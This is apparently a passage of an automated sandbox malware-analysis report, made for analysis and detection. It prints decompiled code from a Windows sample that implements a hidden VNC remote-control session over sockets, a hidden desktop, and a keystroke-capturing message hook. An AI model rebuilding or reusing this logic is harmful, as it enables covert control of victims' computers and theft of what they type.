					if(E004193D2( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E00410F25(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E0041935B(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E00410D64( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E00416EE5(_v36);
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E004163E4( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E004193D2( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E004193D2(_t247, _a4, _v36, _t507) == 0) {
						return E00410EF2(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E0041645B( &_v380,  &_v380, 0, 0xff);
						E0041645B( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								_t274 = E00419658(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t274 != 0x274c) {
									L104:
									E00410EF2(_t505);
									return E004163A8(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E004109FC(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E0041645B(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E00416333(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								_t257 = E0041935B(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = E004193A3(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E0041935B(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E004163E4(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E004193A3(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E0041935B(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E004163A8( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E00416333((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E0041935B(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E0041935B(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E004163E4(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E00416333(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E0041935B(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E0041935B(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E004163E4( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E0041935B(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E0041935B(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E00416378(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E004163A8(0);
									goto L104;
								}
								_t366 = E0041935B(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E004163A8(_t389);
							}
							_t300 = E00416378(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}

0x00410f96
0x00410fa4
0x00410fab
0x00411776
0x00411776
0x00411776
0x00410fb4
0x00410fbc
0x00410fbf
0x00410fc0
0x00410fc7
0x00000000
0x00000000
0x00410fd0
0x00410fd3
0x00410fdb
0x00410fe2
0x00000000
0x00000000
0x00410fe8
0x00410feb
0x00410ff3
0x00411010
0x0041101d
0x00000000
0x00411023
0x00411025
0x00411031
0x00411034
0x00411037
0x0041105f
0x00411066
0x00411068
0x00411072
0x00411074
0x00411074
0x0041107b
0x0041107e
0x00000000
0x0041176d
0x00411084
0x00411085
0x00000000
0x00000000
0x00411099
0x004110a0
0x00000000
0x00000000
0x004110af
0x004110b4
0x00000000
0x00000000
0x004110bc
0x004110c7
0x004110ca
0x004110cc
0x004110ce
0x00000000
0x00000000
0x004110da
0x004110df
0x004110e3
0x00000000
0x00000000
0x004110f5
0x00411102
0x00411115
0x0041113a
0x0041113f
0x00411147
0x0041114c
0x00411151
0x00411156
0x0041116b
0x00000000
0x0041118b
0x00411198
0x004111a4
0x004111a7
0x004111ab
0x004111b9
0x004111be
0x004111c1
0x004111c1
0x004111c4
0x004111c4
0x004111c4
0x004111c4
0x004111c7
0x004111cb
0x00000000
0x00000000
0x004111d1
0x004111dd
0x004111e5
0x00000000
0x00000000
0x004111eb
0x004111f6
0x0041174d
0x0041174f
0x00000000
0x00411757
0x004111ff
0x00411206
0x00411206
0x00411211
0x00411214
0x00411219
0x0041128c
0x0041128f
0x00411298
0x00411298
0x00000000
0x004111c4
0x004111c4
0x004111c4
0x004111c4
0x004111c7
0x004111cb
0x00000000
0x00000000
0x00000000
0x004111cb
0x0041168e
0x0041168e
0x0041168e
0x00000000
0x0041121b
0x0041121b
0x0041121e
0x00411221
0x00411224
0x0041122c
0x00411235
0x00411236
0x0041123b
0x00411243
0x00411735
0x00411739
0x0041173e
0x0041173e
0x00000000
0x00411251
0x00411254
0x00411259
0x0041125d
0x00411276
0x0041125f
0x0041125f
0x00411262
0x0041126a
0x0041126a
0x0041125d
0x00000000
0x00411254
0x00411243
0x0041127b
0x0041127b
0x00411281
0x00411285
0x0041128a
0x00000000
0x0041128a
0x004112a3
0x004112a3
0x004112b3
0x004112b5
0x004112ba
0x004112bc
0x00000000
0x00000000
0x004112c6
0x004112c6
0x004112c9
0x004116c7
0x004116cc
0x004116ce
0x00000000
0x00000000
0x004116d0
0x004116d4
0x004116d7
0x004116da
0x004116df
0x004116e1
0x00000000
0x00000000
0x004116e3
0x004116e7
0x004116f5
0x004116f5
0x004116f9
0x00000000
0x00000000
0x004116fb
0x00411700
0x00411705
0x0041170a
0x00411713
0x0041171a
0x0041171e
0x00411722
0x0041172d
0x004111c4
0x004111c4
0x004111c4
0x004111c7
0x004111cb
0x00000000
0x00000000
0x00000000
0x004111cb
0x004111c4
0x004116e9
0x004116ed
0x00000000
0x00000000
0x004116ef
0x004116f3
0x00000000
0x00000000
0x00000000
0x004116f3
0x004112d0
0x004112d0
0x004112d1
0x00411592
0x00411597
0x00411599
0x00000000
0x00000000
0x0041159f
0x004115a3
0x004115a6
0x004115a9
0x004115ae
0x004115b0
0x00000000
0x00000000
0x004115ba
0x004115cb
0x004115cd
0x004115d1
0x004115d4
0x00411661
0x00411661
0x00411684
0x00411686
0x00411689
0x0041168c
0x004116b5
0x004116ba
0x004111c4
0x004111c4
0x004111c4
0x004111c7
0x004111cb
0x00000000
0x00000000
0x00000000
0x004111cb
0x004111c4
0x00000000
0x0041168c
0x004115dd
0x004115e0
0x004115e0
0x004115e5
0x004115ea
0x004115ec
0x00000000
0x00000000
0x004115fe
0x00411603
0x00411605
0x00000000
0x00000000
0x0041160b
0x00411611
0x00411615
0x00000000
0x00000000
0x00411617
0x00411619
0x00411619
0x00411644
0x00411646
0x0041164b
0x0041164c
0x0041164f
0x00411651
0x00411651
0x00411654
0x0041165b
0x0041165b
0x00000000
0x00411619
0x004112d7
0x004112d7
0x004112d8
0x00411501
0x00411505
0x00411508
0x0041150b
0x00411510
0x00411512
0x00000000
0x00000000
0x00411518
0x0041151d
0x00411522
0x00411527
0x0041152c
0x00411535
0x00411537
0x0041153a
0x0041153d
0x00411559
0x00411559
0x0041155c
0x00411577
0x00411584
0x004111c4
0x004111c4
0x004111c4
0x004111c7
0x004111cb
0x00000000
0x00000000
0x00000000
0x004111cb
0x00000000
0x004111c4
0x0041155e
0x0041156a
0x0041156f
0x00411571
0x00000000
0x00000000
0x00000000
0x00411571
0x00411542
0x00411542
0x00411545
0x00411545
0x00411549
0x00000000
0x00000000
0x0041154b
0x0041154e
0x00000000
0x00000000
0x00411550
0x00411550
0x00411551
0x00411554
0x00411554
0x00000000
0x00411545
0x004112de
0x004112de
0x004112df
0x004114ac
0x004114b0
0x004114b3
0x004114b6
0x004114bb
0x004114bd
0x00000000
0x00000000
0x004114c3
0x004114f5
0x004114f9
0x00000000
0x004114f9
0x004112e5
0x004112e5
0x004112e6
0x00411386
0x0041138a
0x0041138d
0x00411390
0x00411395
0x00411397
0x00000000
0x00000000
0x0041139d
0x004113a2
0x004113a7
0x004113ad
0x004113b2
0x004113b8
0x004113be
0x004113c1
0x004113c5
0x004113d1
0x004113d1
0x004113d6
0x004113d6
0x004113de
0x004113e4
0x004113e6
0x004113e8
0x004113ea
0x004113fe
0x00411407
0x00411407
0x004113ec
0x004113ee
0x004113f7
0x004113f7
0x0041140a
0x0041140a
0x0041140a
0x00411411
0x00411417
0x00411419
0x0041141b
0x0041141d
0x00411431
0x0041143a
0x0041143a
0x0041141f
0x00411421
0x0041142a
0x0041142a
0x0041143d
0x0041143d
0x0041143d
0x00411442
0x00411447
0x00411449
0x0041144d
0x00411459
0x00411459
0x00411459
0x0041145b
0x0041145f
0x00411461
0x00411461
0x00411467
0x00411467
0x0041146e
0x00411472
0x00411474
0x00411474
0x0041147a
0x0041147a
0x0041148b
0x00411497
0x004114a4
0x00000000
0x004114a4
0x004113cb
0x004113cf
0x00000000
0x00000000
0x00000000
0x004113cf
0x004112ec
0x004112ed
0x00000000
0x00000000
0x004112f3
0x004112f7
0x004112fa
0x004112fd
0x00411302
0x00411304
0x00000000
0x00000000
0x0041130a
0x0041130e
0x00411311
0x00411314
0x00411319
0x0041131b
0x00000000
0x00000000
0x00411347
0x00411350
0x00411352
0x00411354
0x00411748
0x00000000
0x00411748
0x00411362
0x00411367
0x00411369
0x00000000
0x00000000
0x00411372
0x00411378
0x0041137c
0x0041137c
0x0041169d
0x004116a2
0x004116a5
0x004116a5
0x00000000
0x004116ad
0x0041116b

APIs

Part of subcall function 004193D2: send.WS2_32(00000004,00000004,00000004,00000000), ref: 004193E0

WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,004081C4,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 004111EB
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411206
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411298
GetSystemMetrics.USER32 ref: 004113B2

Part of subcall function 0041935B: recv.WS2_32(?,?,00000001,00000000), ref: 0041937F

ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041173E

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Strings

, xrefs: 004116E3
RFB 003.003, xrefs: 00410F9C
RFB , xrefs: 00410FD6
x, xrefs: 00411467

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: a93dd77a0eee532d62e5b0d67c93449088a3f373f4f35f522cc820a925edcc70
Instruction ID: 50a7ee7c8732a9901e3919c1521522228c6d68869365aea7d3e4266546838760
Opcode Fuzzy Hash: a93dd77a0eee532d62e5b0d67c93449088a3f373f4f35f522cc820a925edcc70
Instruction Fuzzy Hash: 3132F331A00219ABDF14DBA4C855BEEB7B5EF45304F04402BEA61E73D2DB789D85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404C67, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C67(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E0040FA33(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E00404C3F(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E0040FA33(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E00404BFA(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E00404C3F(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x00404c67
0x00404c72
0x00404c7a
0x00404c7d
0x00404c8c
0x00404c92
0x00404c97
0x00404cb0
0x00404cb9
0x00404cc3
0x00404d4e
0x00404d51
0x00404d57
0x00404d5e
0x00404d5e
0x00404cc9
0x00404ccc
0x00404cd1
0x00404cd3
0x00404cd6
0x00404ce0
0x00404ce0
0x00404cf1
0x00404cf5
0x00404d0b
0x00404d21
0x00404d31
0x00404d31
0x00404d35
0x00404d36
0x00404d3f
0x00000000
0x00000000
0x00000000
0x00404d3f
0x00404d24
0x00404d2a
0x00404d2f
0x00000000
0x00000000
0x00000000
0x00404cf7
0x00404d05
0x00404d07
0x00404d09
0x00404d41
0x00404d41
0x00404d44
0x00404d49
0x00404d49
0x00000000
0x00404d44
0x00000000
0x00404d09
0x00404cf5
0x00404c9f
0x00404ca5
0x00404ca8
0x00404caa
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 00404C8C
CreateWindowStationW.USER32 ref: 00404C9F
GetProcessWindowStation.USER32 ref: 00404CB0
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00404CEB
CreateDesktopW.USER32 ref: 00404CFF
GetCurrentThreadId.KERNEL32 ref: 00404D0B
GetThreadDesktop.USER32(00000000), ref: 00404D12
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00404D24
CloseDesktop.USER32(00000000,00000000,00000000), ref: 00404D36
CloseWindowStation.USER32(?,?), ref: 00404D51

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: afaf32fb5f6055d3f23273ee38eec15e2a428bf5be9e2cf8a09f586e91da02a3
Instruction ID: e2f82abc2b0256a60be68959b120be1a606b52f3c5ab1152925077326097362d
Opcode Fuzzy Hash: afaf32fb5f6055d3f23273ee38eec15e2a428bf5be9e2cf8a09f586e91da02a3
Instruction Fuzzy Hash: 202180B5804258BFDF206FA59D8899F7F7CEF84345B04447AF905F3261D6388D458A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405D60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405D60(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E0040EEE1() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E00405BC3();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x401620);
						goto L19;
					}
					EnterCriticalSection(0x4228a8);
					if( *0x4228a0 > 0) {
						 *0x4228a0 =  *0x4228a0 + 0xffff;
						_t36 = 2;
						E0040FA33(_t36,  &_v864);
						_t39 = E00411779( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E0040FA33(0,  &_v840);
							_t65 =  &_v884;
							E0040FA33(1, _t65);
							_t45 =  *0x422834; // 0x0
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E0041709B( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E004058C2(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x422e08, GetTickCount());
						}
					}
					LeaveCriticalSection(0x4228a8);
					goto L20;
				}
			}

0x00405d66
0x00405d6d
0x00405d74
0x00405eb6
0x00405ec3
0x00405d87
0x00405d87
0x00405d8f
0x00405e45
0x00405e4a
0x00000000
0x00000000
0x00405e4c
0x00405e50
0x00000000
0x00000000
0x00405e57
0x00405e5d
0x00405e5f
0x00000000
0x00000000
0x00405e7f
0x00405e85
0x00405e87
0x00000000
0x00000000
0x00405e89
0x00405e8c
0x00405e9b
0x00405ea5
0x00405ea5
0x00405ea7
0x00405eb0
0x00405eb1
0x00405eb1
0x00000000
0x00405eb1
0x00405e9d
0x00405e9d
0x00405ea3
0x00000000
0x00000000
0x00000000
0x00405ea3
0x00405e8e
0x00405e92
0x00000000
0x00000000
0x00405e94
0x00000000
0x00405e94
0x00405d9a
0x00405da8
0x00405db3
0x00405dc0
0x00405dc1
0x00405dd0
0x00405dd5
0x00405ddb
0x00405de3
0x00405dea
0x00405def
0x00405df4
0x00405dfb
0x00405dfd
0x00405dfd
0x00405e1e
0x00405e23
0x00405e2d
0x00405e35
